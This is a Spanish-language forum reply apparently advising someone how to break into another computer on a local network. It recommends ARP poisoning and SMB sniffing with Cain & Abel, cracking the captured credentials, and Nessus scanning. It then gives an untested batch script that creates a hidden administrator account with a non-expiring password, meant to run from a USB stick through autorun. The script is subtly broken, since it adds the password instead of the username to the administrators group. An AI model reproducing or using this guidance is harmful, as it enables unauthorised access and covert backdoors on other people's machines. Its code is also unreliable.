Lo que podés hacer es con cain & abel hacer arp poisoning y sniffar el tráfico buscando a alguien que se esté conectando al smb, una vez que se haya conectado, lo podés intentar crackear usando fuerza bruta, diccionarios o rainbow tables.

Y... Podés tratar con nessus, hacé un escaneo y fijate si encontrás algo... Supongo que debes de tener acceso físico a esta computadora ya que estas en una lan (a menos obviamente q estés en una vpn, en cuyo caso no va a funcionar el método con cain y abel), si tenés acceso físico a esta pc, podés dejarla vulnerable con muchas cosas, desde un troyano, hasta un script que agregue un usuario con un nombre de usuario y una contraseña.
No lo probé, pero debería funcionar:
Este script agrega un usuario llamado "sys" con la contraseña "elhacker", lo agrega al grupo de administradores y luego edita una clave en el registro para ocultarlo de la pantalla de bienvenida, luego, evita que expire la contraseña.

ECHO OFF
CLS
net user sys elhacker /add
net localgroup administradores elhacker /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sys /t REG_DWORD /d 0
wmic path win32_useraccount where name='sys' set passwordexpires=false
 

Eso lo metés en un pendrive, luego modificas el autorun.inf para que se ejecute automáticamente y listo...
Lo único q tenes que hacer, es cuando esté prendida esta pc, enchufas el pendrive y listo.